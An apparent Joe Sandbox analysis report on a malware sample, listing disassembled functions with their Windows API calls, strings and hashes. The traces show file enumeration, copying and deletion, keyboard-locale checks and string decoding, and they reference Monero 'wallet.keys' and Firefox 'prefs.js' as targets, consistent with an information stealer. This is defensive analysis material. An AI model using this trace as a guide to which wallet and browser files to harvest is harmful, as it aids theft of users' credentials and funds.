                            • Opcode ID: 0b10e7f9b96e4bc357b10534b96351b9e882da941eb535f48a68b3e368362d6a
                            • Instruction ID: 16571f8da0ade0db7c7ff2eebc65e292b01d18aa7469ec27d0be78e529588f99
                            • Opcode Fuzzy Hash: 0b10e7f9b96e4bc357b10534b96351b9e882da941eb535f48a68b3e368362d6a
                            • Instruction Fuzzy Hash: 3BE1C4719512189AEB98FBA0DC52EEF733AAF54340F40459DB506620D2EF306F8ACF55
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $-$)Nsr$?U}N$Ai~~$Qgog$Uh'}$b@z$d~*w$k3l$n3l${8[_$~{
                            • API String ID: 0-4286980269
                            • Opcode ID: d882fba17a01a4495af7338beaf4b00a254090b93335bb2708cfacfc5b9eb441
                            • Instruction ID: 02b7c932c8ecc84dcf12c1ed530e71011195cff57b0a45f9d0dd7eba2d1d5fab
                            • Opcode Fuzzy Hash: d882fba17a01a4495af7338beaf4b00a254090b93335bb2708cfacfc5b9eb441
                            • Instruction Fuzzy Hash: 84B202F360C2009FE3046E29EC8567AFBE9EF94320F164A3DE6C587744EA7598058697
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006115B8,00610D96), ref: 005FF71E
                            • StrCmpCA.SHLWAPI(?,006115BC), ref: 005FF76F
                            • StrCmpCA.SHLWAPI(?,006115C0), ref: 005FF785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FFAB1
                            • FindClose.KERNEL32(000000FF), ref: 005FFAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: e6685d3f6784f6be6fcd1d2510057626462d588851e8cf3e72dd0db8137c67f4
                            • Instruction ID: 1c44c783e69bb9c2f3720ef5d95e169c1877baf2afa03de4eb2c18990f5959ea
                            • Opcode Fuzzy Hash: e6685d3f6784f6be6fcd1d2510057626462d588851e8cf3e72dd0db8137c67f4
                            • Instruction Fuzzy Hash: 65B164719402089BDB68FFA0DC95FEE777ABF94340F0085ACA50A961C1EF345B49CB96
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0061510C,?,?,?,006151B4,?,?,00000000,?,00000000), ref: 005F1923
                            • StrCmpCA.SHLWAPI(?,0061525C), ref: 005F1973
                            • StrCmpCA.SHLWAPI(?,00615304), ref: 005F1989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005F1D40
                            • DeleteFileA.KERNEL32(00000000), ref: 005F1DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005F1E20
                            • FindClose.KERNEL32(000000FF), ref: 005F1E32
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 0a806340ef29f566472d4517f5f646cd6bf68c8b65e5bfb167e68b2047037b83
                            • Instruction ID: fe1439b1c65615fe1994e57974253510900bcabd316422f85cdd6370f608cb58
                            • Opcode Fuzzy Hash: 0a806340ef29f566472d4517f5f646cd6bf68c8b65e5bfb167e68b2047037b83
                            • Instruction Fuzzy Hash: E8122D719512189ADB9DFBA0CC96EEF737AAF54340F40819DA10A620D1EF306F89CF95
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00610C2E), ref: 005FDE5E
                            • StrCmpCA.SHLWAPI(?,006114C8), ref: 005FDEAE
                            • StrCmpCA.SHLWAPI(?,006114CC), ref: 005FDEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FE3E0
                            • FindClose.KERNEL32(000000FF), ref: 005FE3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 6b6f098f4aac33e10d5feace2f18e1a66c221906db32c3ce77d57a01dd96a929
                            • Instruction ID: 70d9de8ff593a950d947e909c95416225d60e3bcf2577ad76defbd7cf3cc3613
                            • Opcode Fuzzy Hash: 6b6f098f4aac33e10d5feace2f18e1a66c221906db32c3ce77d57a01dd96a929
                            • Instruction Fuzzy Hash: DBF1BF719602189ADB9DEBA0CC96EEF733ABF54340F40419DA50A620D1EF346F89CF56
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006114B0,00610C2A), ref: 005FDAEB
                            • StrCmpCA.SHLWAPI(?,006114B4), ref: 005FDB33
                            • StrCmpCA.SHLWAPI(?,006114B8), ref: 005FDB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FDDCC
                            • FindClose.KERNEL32(000000FF), ref: 005FDDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 74974933681d096f2f3c9bb84fedfbf80a3263934da073fe3a0a4bdb04973b55
                            • Instruction ID: 686499fc5423dc8db2586adb349235e65a60c0f31bb7dfbd20fed8ef286d2154
                            • Opcode Fuzzy Hash: 74974933681d096f2f3c9bb84fedfbf80a3263934da073fe3a0a4bdb04973b55
                            • Instruction Fuzzy Hash: A091557290020897CB58FBB0DC56DFE777EBBD4340F40866CB90696181EE349B498BA6
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,006105AF), ref: 00607BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00607BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00607C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00607C62
                            • LocalFree.KERNEL32(00000000), ref: 00607D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 88eb0ff0ec681df5918cafb035b8209ed4c1402fc1398b78a1385e2ffb96f5a8
                            • Instruction ID: 499406552e776cdec4ad753ac4e6c8adc22c45a6a232760b1002985b2b4802c2
                            • Opcode Fuzzy Hash: 88eb0ff0ec681df5918cafb035b8209ed4c1402fc1398b78a1385e2ffb96f5a8
                            • Instruction Fuzzy Hash: C3416C71980218ABDB68DB94DC89BEEB379FF44700F204199E009622D1DB342F86CFA5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 'na$8U^w$Kqw~$Slc>$XH{n$w8W~$4WS
                            • API String ID: 0-3283391380
                            • Opcode ID: a18fe8ff763688ad135bf57bdd6ff6ee3b3344badd8af2e74e619c26afec73e4
                            • Instruction ID: bb6a62a3c52d30537c39f1ce9e7668baa13561fa0504d3a22d02ec2ac7e3a5bc
                            • Opcode Fuzzy Hash: a18fe8ff763688ad135bf57bdd6ff6ee3b3344badd8af2e74e619c26afec73e4
                            • Instruction Fuzzy Hash: FDB2F7F3A082049FE304AE2DEC8577ABBE9EF94320F1A493DE6C5C7744E63558058697
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00610D73), ref: 005FE4A2
                            • StrCmpCA.SHLWAPI(?,006114F8), ref: 005FE4F2
                            • StrCmpCA.SHLWAPI(?,006114FC), ref: 005FE508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FEBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 84976e58f3a479be5cdf993c285cd0240bf381381868c02f8471ca8019a3808b
                            • Instruction ID: e6abeaab43501fdcd26e2c6bb24826f37fe344c6a5be2ec25276d67058121ac0
                            • Opcode Fuzzy Hash: 84976e58f3a479be5cdf993c285cd0240bf381381868c02f8471ca8019a3808b
                            • Instruction Fuzzy Hash: 7C1282719502089ADB9CFBA0DC96EEF733AAF94340F40859CB50A560D1EF346F49CB96
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (w;$c+yy$lIzv$r!~s$~Vi/$Xgy
                            • API String ID: 0-2706887180
                            • Opcode ID: a6563f835944a64bd03b191799adeba5ebf3941ba32f7808e52518b423db11e5
                            • Instruction ID: d41f5498ba341c773c1702432ad23c3813d4521b12751cd654d6608e1d168fde
                            • Opcode Fuzzy Hash: a6563f835944a64bd03b191799adeba5ebf3941ba32f7808e52518b423db11e5
                            • Instruction Fuzzy Hash: 70B23AF3A0C2049FE304AE2DEC8577AB7D9EF94320F1A853DEAC5C7744EA3558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                             • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #]}$3{g$4I?$B]w$SNW$qzo
                            • API String ID: 0-3843887360
                            • Opcode ID: 0b0fd1ea5cb0cb7cc599caa35c961438469e018faea54e36ef4ded48122056ef
                            • Instruction ID: cdadbfb19d69806d82b7ff5ba4807b138c8f54f19c80b6d77901f1ae55cc030d
                            • Opcode Fuzzy Hash: 0b0fd1ea5cb0cb7cc599caa35c961438469e018faea54e36ef4ded48122056ef
                            • Instruction Fuzzy Hash: C6B2F7F360C2009FE3046E2DEC8577ABBE9EF94720F1A453DEAC4C7744EA3598058696
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,005F4EEE,00000000,?), ref: 005F9B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N_,00000000,00000000), ref: 005F9B2A
                            • LocalFree.KERNEL32(?,?,?,?,005F4EEE,00000000,?), ref: 005F9B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
